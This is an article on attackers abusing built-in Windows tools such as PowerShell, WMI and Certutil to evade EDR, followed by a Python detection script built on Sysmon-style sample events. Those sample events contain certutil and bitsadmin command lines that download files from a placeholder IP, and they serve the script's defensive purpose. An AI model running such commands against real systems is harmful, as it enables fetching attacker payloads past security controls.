Hackers are Moving to “Living Off the Land” Techniques to Attack Windows Systems Bypassing EDR

Cybercriminals have found a more effective method to compromise Windows computers while evading detection by security software.

Ivan Spiridonov observed that, instead of uploading malicious tools, hackers are now using legitimate Windows programs already installed on target systems, a tactic known as “living off the land” (LOLBins, or Living Off the Land Binaries).

This differs from traditional attacks that rely on external tools like Mimikatz or PowerShell Empire, which are easily detected by endpoint detection and response (EDR) solutions.

Why This Method Works

This new approach leverages Microsoft-signed programs such as PowerShell, Windows Management Instrumentation (WMI), Certutil, and BITSAdmin.

These tools are trusted by default because system administrators use them every day for legitimate work.

The appeal is straightforward: security software typically flags suspicious files, but Windows’ built-in tools are signed by Microsoft and allowed by default.


When attackers use these legitimate programs for malicious purposes, their activity blends seamlessly with normal administrative operations, making detection nearly impossible without sophisticated behavioral analysis.

A red team operator discovered this advantage firsthand during a security assessment. After uploading a password-dumping tool to a Windows machine, security staff detected and blocked the attack within 15 minutes.

But when using only built-in Windows utilities, the same operator maintained access for three weeks, moved across 15 different systems, and extracted data without triggering a single security alert.

Common Living Off the Land Techniques

Attackers use various native Windows tools for different objectives. PowerShell handles reconnaissance and command execution.

WMI enables remote system queries and process creation. Scheduled tasks provide persistence without the need for suspicious executables. And Windows services enable long-term access with system-level privileges.

Criminals use Certutil to download files, BITSAdmin for background transfers, DNS for covert tunneling, and even email applications to exfiltrate sensitive information.

Security teams face a nearly impossible challenge: they cannot simply block these tools because their own IT staff depends on them for normal operations.

Disabling PowerShell would break automation scripts. Removing WMI would damage system management capabilities.

This creates a fundamental dilemma: allow these tools and accept the risk, or block them and cripple legitimate business functions.

Defense requires a fundamental shift away from signature-based detection toward comprehensive logging and behavioral analysis.

| Utility / Feature | Malicious Function | Why It Evades Detection |
|---|---|---|
| PowerShell | Used for reconnaissance, dumping credentials, and moving laterally across the network. | It is a trusted Microsoft automation tool, so malicious scripts look like normal IT operations. |
| WMI (Windows Management Instrumentation) | Enables remote command execution on other systems. | Allows attackers to execute commands without uploading files or using suspicious protocols. |
| Certutil.exe | Abused to download malicious payloads from the internet or exfiltrate stolen data. | It is a legitimate certificate authority utility that is explicitly allowed by most security controls. |
| Scheduled Tasks | Creates persistent access by setting up jobs that execute attacker code at specific times. | Malicious tasks are disguised as legitimate system maintenance jobs. |
| Windows Registry | Used to establish persistence and modify system configurations. | |

Security teams need PowerShell script block logging, command-line auditing, WMI activity monitoring, and tools such as Sysmon to track detailed system behavior.

Defenders should also implement strict application allowlisting policies and monitor unusual process relationships, Ivan Spiridonov added.

Watch for suspicious network connections from administrative tools, and establish baselines for regular administrative activity.

These measures can identify when legitimate tools are being abused for malicious purposes, even if individual commands appear normal.
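As an added example (not from the article or from Ivan Spiridonov's work), the following Python script applies behavioural rules of the kind described above to constructed Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) records: it keys on the download behaviour of Certutil and BITSAdmin, on an unusual parent/child relationship (a shell spawned by the WMI provider host), and on administrative tools connecting outside a baseline of known destinations. The field names follow Sysmon; the events, the baseline destination set and the rule names are assumptions made for illustration.

```python
import ntpath

ADMIN_TOOLS = {"powershell.exe", "certutil.exe", "bitsadmin.exe", "wmic.exe"}
# Hypothetical baseline: hosts that admin tools legitimately contact (e.g. a patch server).
BASELINE_DESTS = {"10.0.0.5"}

def proc(image, cmd, parent, user):  # constructed Sysmon Event ID 1 (process create) record
    return {"EventID": 1, "Image": image, "CommandLine": cmd,
            "ParentImage": parent, "User": user}

def net(image, dest, user):  # constructed Sysmon Event ID 3 (network connection) record
    return {"EventID": 3, "Image": image, "DestinationIp": dest, "User": user}

SYS32 = r"C:\Windows\System32"
PS = SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed sample telemetry, not real data
    proc(SYS32 + r"\certutil.exe", "certutil -urlcache -split -f http://203.0.113.7/a.txt a.txt",
         SYS32 + r"\cmd.exe", "CORP\\alice"),
    proc(PS, "powershell -c Get-Process", SYS32 + r"\wbem\WmiPrvSE.exe", "CORP\\alice"),
    proc(SYS32 + r"\bitsadmin.exe", "bitsadmin /transfer j /download http://203.0.113.7/b.bin C:\\Users\\Public\\b.bin",
         SYS32 + r"\cmd.exe", "CORP\\alice"),
    net(SYS32 + r"\certutil.exe", "203.0.113.7", "CORP\\alice"),
    proc(PS, "powershell -File C:\\scripts\\patch.ps1", r"C:\Windows\explorer.exe", "CORP\\bob"),
    net(PS, "10.0.0.5", "CORP\\bob"),
]

def check_event(ev, baseline=BASELINE_DESTS):
    """Return the rule names one event trips; each command may look routine on its
    own, so the rules key on behaviour: downloads, parent/child pairs, destinations."""
    name, hits = ntpath.basename(ev["Image"]).lower(), []
    if ev["EventID"] == 1:
        cmd, parent = ev["CommandLine"].lower(), ntpath.basename(ev["ParentImage"]).lower()
        if name == "certutil.exe" and "urlcache" in cmd:
            hits.append("certutil_download")
        if name == "bitsadmin.exe" and "/transfer" in cmd:
            hits.append("bitsadmin_transfer")
        if parent == "wmiprvse.exe" and name in {"powershell.exe", "cmd.exe"}:
            hits.append("wmi_spawned_shell")  # WMI-driven execution: unusual parent process
    elif ev["EventID"] == 3:
        if name in ADMIN_TOOLS and ev["DestinationIp"] not in baseline:
            hits.append("admin_tool_offbaseline_connection")
    return hits

def detect(events, baseline=BASELINE_DESTS):
    """Group tripped rules per user: several weak signals on one account add up."""
    findings = {}
    for ev in events:
        for rule in check_event(ev, baseline):
            findings.setdefault(ev["User"], []).append(rule)
    return findings
```

Running detect(EVENTS) attributes four separate rule hits to the same account while the routine PowerShell use by the second user stays silent, which is the pattern-level view the article argues for.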

As attackers continue evolving their methods, organizations must move beyond blocking known tools and focus instead on detecting suspicious behavior patterns that indicate compromise, regardless of which legitimate application is being misused.
